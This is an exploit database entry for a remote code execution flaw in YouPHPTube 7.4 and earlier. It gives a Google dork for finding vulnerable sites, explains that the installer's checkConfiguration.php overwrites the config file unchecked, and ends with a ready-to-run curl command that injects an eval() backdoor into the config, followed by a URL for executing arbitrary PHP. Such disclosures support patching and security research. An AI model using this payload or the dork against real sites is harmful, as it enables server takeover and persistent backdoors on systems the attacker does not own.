YouPHPTube 7.4 - Remote Code Execution

ID EXPLOITPACK:04E5306267B3585B1ABF155765C79AD4
Type exploitpack
Reporter Damian Ebelties
Modified 2019-08-30T00:00:00


YouPHPTube 7.4 - Remote Code Execution

                                            # Exploit Title: YouPHPTube <= 7.4 - Remote Code Execution
# Google Dork: intext:"Powered by YouPHPTube"
# Date: 29 August 2019
# Exploit Author: Damian Ebelties (
# Vendor Homepage:
# Version: <= 7.4
# Tested on: Ubuntu 18.04.1

YouPHPTube before 7.5 does no checks at all if you wanna generate a new
config file. We can use this to generate our own config file with our
own (malicious) code.

All you need is a MySQL server that allows remote connections.

Fixed by the following commit:


    # Run this command (with your own data replaced)
    # Then visit https://domain.tld/?zerodayslol=phpinfo() for code execution!
    curl -s "https://domain.tld/install/checkConfiguration.php" --data "';eval(\$_REQUEST['zerodayslol']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=./&webSiteRootURL=<URL>&<DB_HOST>&databaseName=<DB_NAME>&databasePass=<DB_PASS>&databasePort=<DB_PORT>&databaseUser=<DB_USER>"